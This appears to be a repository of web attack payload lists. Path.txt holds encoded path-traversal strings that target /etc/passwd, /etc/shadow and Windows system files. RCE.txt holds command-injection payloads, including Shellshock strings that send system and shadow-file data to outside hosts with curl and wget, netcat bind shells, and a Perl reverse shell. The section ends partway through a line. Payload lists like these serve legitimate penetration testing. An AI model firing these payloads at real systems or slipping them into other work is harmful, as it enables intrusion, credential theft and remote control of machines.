├── Path.txt ├── RCE.txt ├── README.md ├── SQLI.txt └── XSS.txt /Path.txt: -------------------------------------------------------------------------------- 1 | \..\WINDOWS\win.ini 2 | \..\..\WINDOWS\win.ini 3 | \..\..\..\WINDOWS\win.ini 4 | \..\..\..\..\WINDOWS\win.ini 5 | \..\..\..\..\..\WINDOWS\win.ini 6 | \..\..\..\..\..\..\WINDOWS\win.ini 7 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 8 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 9 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 10 | %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 11 | %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 12 | %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 13 | %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 14 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 15 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 16 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 17 | %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 18 | ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 19 | ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 20 | ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 21 | ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 22 | ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 23 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 24 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ 25 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 26 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 27 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 28 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 29 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 30 | %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 31 | %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c 32 | ../../../../../../../../../etc/passwd 33 | ../../../../../../../../etc/passwd 34 | ../../../../../../../etc/passwd 35 | ../../../../../../etc/passwd 36 | ../../../../../etc/passwd 37 | ../../../../etc/passwd 38 | ../../../etc/passwd 39 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 40 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 41 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 42 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 43 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 44 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 45 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 46 | %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 47 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 48 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 49 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 50 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 51 | ../../../.htaccess 52 | ../../.htaccess 53 | ../.htaccess 54 | .htaccess 55 | ././.htaccess 56 | %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 57 | %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 58 | %2e%2e%2f%2e%68%74%61%63%63%65%73%73 59 | %2e%68%74%61%63%63%65%73%73 60 | %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 61 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 62 | %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 63 | %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 64 | %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 65 | %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 66 | ../../../../../../../../../../../../etc/hosts%00 67 | ../../../../../../../../../../../../etc/hosts 68 | ../../boot.ini 69 | /../../../../../../../../%2A 70 | ../../../../../../../../../../../../etc/passwd%00 71 | ../../../../../../../../../../../../etc/passwd 72 | ../../../../../../../../../../../../etc/shadow%00 73 | ../../../../../../../../../../../../etc/shadow 74 | /../../../../../../../../../../etc/passwd^^ 75 | /../../../../../../../../../../etc/shadow^^ 76 | /../../../../../../../../../../etc/passwd 77 | /../../../../../../../../../../etc/shadow 78 | /./././././././././././etc/passwd 79 | /./././././././././././etc/shadow 80 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 81 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 82 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 83 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 84 | /..\../..\../..\../..\../..\../..\../etc/passwd 85 | /..\../..\../..\../..\../..\../..\../etc/shadow 86 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 87 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 88 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 89 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 90 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 91 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 92 | %0a/bin/cat%20/etc/passwd 93 | %0a/bin/cat%20/etc/shadow 94 | %00/etc/passwd%00 95 | %00/etc/shadow%00 96 | %00../../../../../../etc/passwd 97 | %00../../../../../../etc/shadow 98 | /../../../../../../../../../../../etc/passwd%00.jpg 99 | /../../../../../../../../../../../etc/passwd%00.html 100 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 101 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 102 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 103 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 104 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 105 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 106 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 107 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 108 | \\'/bin/cat%20/etc/passwd\\' 109 | \\'/bin/cat%20/etc/shadow\\' 110 | ../../../../../../../../conf/server.xml 111 | /../../../../../../../../bin/id| 112 | C:/inetpub/wwwroot/global.asa 113 | C:\inetpub\wwwroot\global.asa 114 | C:/boot.ini 115 | C:\boot.ini 116 | ../../../../../../../../../../../../localstart.asp%00 117 | ../../../../../../../../../../../../localstart.asp 118 | ../../../../../../../../../../../../boot.ini%00 119 | ../../../../../../../../../../../../boot.ini 120 | /./././././././././././boot.ini 121 | /../../../../../../../../../../../boot.ini%00 122 | /../../../../../../../../../../../boot.ini 123 | /..\../..\../..\../..\../..\../..\../boot.ini 124 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 125 | \..\..\..\..\..\..\..\..\..\..\boot.ini 126 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 127 | ..\..\..\..\..\..\..\..\..\..\boot.ini 128 | /../../../../../../../../../../../boot.ini%00.html 129 | /../../../../../../../../../../../boot.ini%00.jpg 130 | /.../.../.../.../.../ 131 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 132 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -------------------------------------------------------------------------------- /RCE.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ;id; 7 | ;id 8 | ;netstat -a; 9 | ;id; 10 | |id 11 | |/usr/bin/id 12 | |id| 13 | |/usr/bin/id| 14 | ||/usr/bin/id| 15 | |id; 16 | ||/usr/bin/id; 17 | ;id| 18 | ;|/usr/bin/id| 19 | \n/bin/ls -al\n 20 | \n/usr/bin/id\n 21 | \nid\n 22 | \n/usr/bin/id; 23 | \nid; 24 | \n/usr/bin/id| 25 | \nid| 26 | ;/usr/bin/id\n 27 | ;id\n 28 | |usr/bin/id\n 29 | |nid\n 30 | `id` 31 | `/usr/bin/id` 32 | a);id 33 | a;id 34 | a);id; 35 | a;id; 36 | a);id| 37 | a;id| 38 | a)|id 39 | a|id 40 | a)|id; 41 | a|id 42 | |/bin/ls -al 43 | a);/usr/bin/id 44 | a;/usr/bin/id 45 | a);/usr/bin/id; 46 | a;/usr/bin/id; 47 | a);/usr/bin/id| 48 | a;/usr/bin/id| 49 | a)|/usr/bin/id 50 | a|/usr/bin/id 51 | a)|/usr/bin/id; 52 | a|/usr/bin/id 53 | ;system('cat%20/etc/passwd') 54 | ;system('id') 55 | ;system('/usr/bin/id') 56 | %0Acat%20/etc/passwd 57 | %0A/usr/bin/id 58 | %0Aid 59 | %0A/usr/bin/id%0A 60 | %0Aid%0A 61 | & ping -i 30 127.0.0.1 & 62 | & ping -n 30 127.0.0.1 & 63 | %0a ping -i 30 127.0.0.1 %0a 64 | `ping 127.0.0.1` 65 | | id 66 | & id 67 | ; id 68 | %0a id %0a 69 | `id` 70 | $;/usr/bin/id` 71 | || 72 | | 73 | ; 74 | ' 75 | '" 76 | " 77 | "' 78 | & 79 | && 80 | %0a 81 | %0a%0d 82 | %0Acat%20/etc/passwd 83 | %0Aid 84 | %0a id %0a 85 | %0Aid%0A 86 | %0a ping -i 30 127.0.0.1 %0a 87 | %0A/usr/bin/id 88 | %0A/usr/bin/id%0A 89 | %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 90 | %20{${phpinfo()}} 91 | %20{${sleep(20)}} 92 | %20{${sleep(3)}} 93 | a|id| 94 | a;id| 95 | a;id; 96 | a;id\n 97 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" 98 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" 99 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" 100 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" 101 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" 102 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" 103 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" 104 | () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" 105 | () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" 106 | () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" 107 | () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" 108 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" 109 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" 110 | () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" 111 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" 112 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" 113 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" 114 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" 115 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" 116 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" 117 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" 118 | cat /etc/hosts 119 | $(`cat /etc/passwd`) 120 | cat /etc/passwd 121 | () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 122 | | curl http://crowdshield.com/.testing/rce.txt 123 | & curl http://crowdshield.com/.testing/rce.txt 124 | ; curl https://crowdshield.com/.testing/rce_vuln.txt 125 | && curl https://crowdshield.com/.testing/rce_vuln.txt 126 | curl https://crowdshield.com/.testing/rce_vuln.txt 127 | curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt 128 | curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt 129 | $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 130 | dir 131 | | dir 132 | ; dir 133 | $(`dir`) 134 | & dir 135 | &&dir 136 | && dir 137 | | dir C:\ 138 | ; dir C:\ 139 | & dir C:\ 140 | && dir C:\ 141 | dir C:\ 142 | | dir C:\Documents and Settings\* 143 | ; dir C:\Documents and Settings\* 144 | & dir C:\Documents and Settings\* 145 | && dir C:\Documents and Settings\* 146 | dir C:\Documents and Settings\* 147 | | dir C:\Users 148 | ; dir C:\Users 149 | & dir C:\Users 150 | && dir C:\Users 151 | dir C:\Users 152 | ;echo%20'' 153 | echo ''// XXXXXXXXXXX 154 | | echo "" > rfi.php 155 | ; echo "" > rfi.php 156 | & echo "" > rfi.php 157 | && echo "" > rfi.php 158 | echo "" > rfi.php 159 | | echo "" > dir.php 160 | ; echo "" > dir.php 161 | & echo "" > dir.php 162 | && echo "" > dir.php 163 | echo "" > dir.php 164 | | echo "" > cmd.php 165 | ; echo "" > cmd.php 166 | & echo "" > cmd.php 167 | && echo "" > cmd.php 168 | echo "" > cmd.php 169 | ;echo '' 170 | echo ''// XXXXXXXXXXX 171 | echo ''// XXXXXXXXXXX 172 | | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 173 | ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl 174 | & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 175 | && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 176 | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl 177 | () { :;}; echo vulnerable 10 178 | eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 179 | eval('ls') 180 | eval('pwd') 181 | eval('pwd'); 182 | eval('sleep 5') 183 | eval('sleep 5'); 184 | eval('whoami') 185 | eval('whoami'); 186 | exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 187 | exec('ls') 188 | exec('pwd') 189 | exec('pwd'); 190 | exec('sleep 5') 191 | exec('sleep 5'); 192 | exec('whoami') 193 | exec('whoami'); 194 | ;{$_GET["cmd"]} 195 | `id` 196 | |id 197 | | id 198 | ;id 199 | ;id| 200 | ;id; 201 | & id 202 | &&id 203 | ;id\n 204 | ifconfig 205 | | ifconfig 206 | ; ifconfig 207 | & ifconfig 208 | && ifconfig 209 | /index.html|id| 210 | ipconfig 211 | | ipconfig /all 212 | ; ipconfig /all 213 | & ipconfig /all 214 | && ipconfig /all 215 | ipconfig /all 216 | ls 217 | $(`ls`) 218 | | ls -l / 219 | ; ls -l / 220 | & ls -l / 221 | && ls -l / 222 | ls -l / 223 | | ls -laR /etc 224 | ; ls -laR /etc 225 | & ls -laR /etc 226 | && ls -laR /etc 227 | | ls -laR /var/www 228 | ; ls -laR /var/www 229 | & ls -laR /var/www 230 | && ls -laR /var/www 231 | | ls -l /etc/ 232 | ; ls -l /etc/ 233 | & ls -l /etc/ 234 | && ls -l /etc/ 235 | ls -l /etc/ 236 | ls -lh /etc/ 237 | | ls -l /home/* 238 | ; ls -l /home/* 239 | & ls -l /home/* 240 | && ls -l /home/* 241 | ls -l /home/* 242 | *; ls -lhtR /var/www/ 243 | | ls -l /tmp 244 | ; ls -l /tmp 245 | & ls -l /tmp 246 | && ls -l /tmp 247 | ls -l /tmp 248 | | ls -l /var/www/* 249 | ; ls -l /var/www/* 250 | & ls -l /var/www/* 251 | && ls -l /var/www/* 252 | ls -l /var/www/* 253 | 254 | 255 | 256 | \n 257 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` 258 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` 259 | \n/bin/ls -al\n 260 | | nc -lvvp 4444 -e /bin/sh| 261 | ; nc -lvvp 4444 -e /bin/sh; 262 | & nc -lvvp 4444 -e /bin/sh& 263 | && nc -lvvp 4444 -e /bin/sh & 264 | nc -lvvp 4444 -e /bin/sh 265 | nc -lvvp 4445 -e /bin/sh & 266 | nc -lvvp 4446 -e /bin/sh| 267 | nc -lvvp 4447 -e /bin/sh; 268 | nc -lvvp 4448 -e /bin/sh& 269 | \necho 